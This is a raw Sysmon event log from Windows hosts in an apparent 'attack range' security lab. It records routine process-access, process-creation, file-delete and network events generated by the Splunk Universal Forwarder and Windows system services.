l+51791 10341000x8000000000000000214173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0E3D-6216-F503-000000003902}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E3D-6216-F503-000000003902}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.139{4F8D34B0-0E3D-6216-F503-000000003902}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:46.213{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B2A2A325BB227DDC90357C4CD684CE5,SHA256=D2D66A62924938C743EA80DBCED466BA6DDAB4E25EDFBDB23373966D319AB4B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:46.451{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56EDEAD4B085EF0176E48080891777EE,SHA256=24675AFB4524D60450851357DCCAFA721D9533F7710203A4244754A4E0FABC11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:46.373{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECB2C2407A23E9EEFA0BD5301C342C18,SHA256=868D93EB4B639020048FF2406FA896EE93507E50F6B9ECD55F003F8D90BFA41A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:46.373{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7087DA270121809448125185ED4D59C9,SHA256=4E8E297AA09FE201FD4E1D813E629EB4572E1E00A8B58460F9ACD24A8E6E40E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:45.093{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51174-false10.0.1.12-8089- 10341000x8000000000000000214213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.607{4F8D34B0-0E3F-6216-F703-000000003902}3304608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.467{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C57F3E682716608C0A321881FA41AFAE,SHA256=1E5223D628184EEE37D9168F6441D9CA2CEEEC3EAB480BA9413E68D81DCD122D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:47.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=449ACBAC855DCCB7FED8810BAD14A066,SHA256=1FF8B4AC8D6A9C8B85DDC13A160791B15830F6DBCFCF8E5CD11070A2C39FA5F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E3F-6216-F703-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0E3F-6216-F703-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.435{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E3F-6216-F703-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:47.437{4F8D34B0-0E3F-6216-F703-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.623{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECB2C2407A23E9EEFA0BD5301C342C18,SHA256=868D93EB4B639020048FF2406FA896EE93507E50F6B9ECD55F003F8D90BFA41A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.482{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FFBA2AA1C143F636CF2978F06005CBB,SHA256=D29030311EC5887E53FE7851476A4D7468BBCF44367403EB967CBB3263777467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:48.322{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11FA21B9C9B96C3EB7665B3A8EDC6342,SHA256=230706954FF6FC666549A2D7DEB7B82B2A4DB48E3A7594682CC9996AD366A894,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:48.107{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E40-6216-F803-000000003902}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 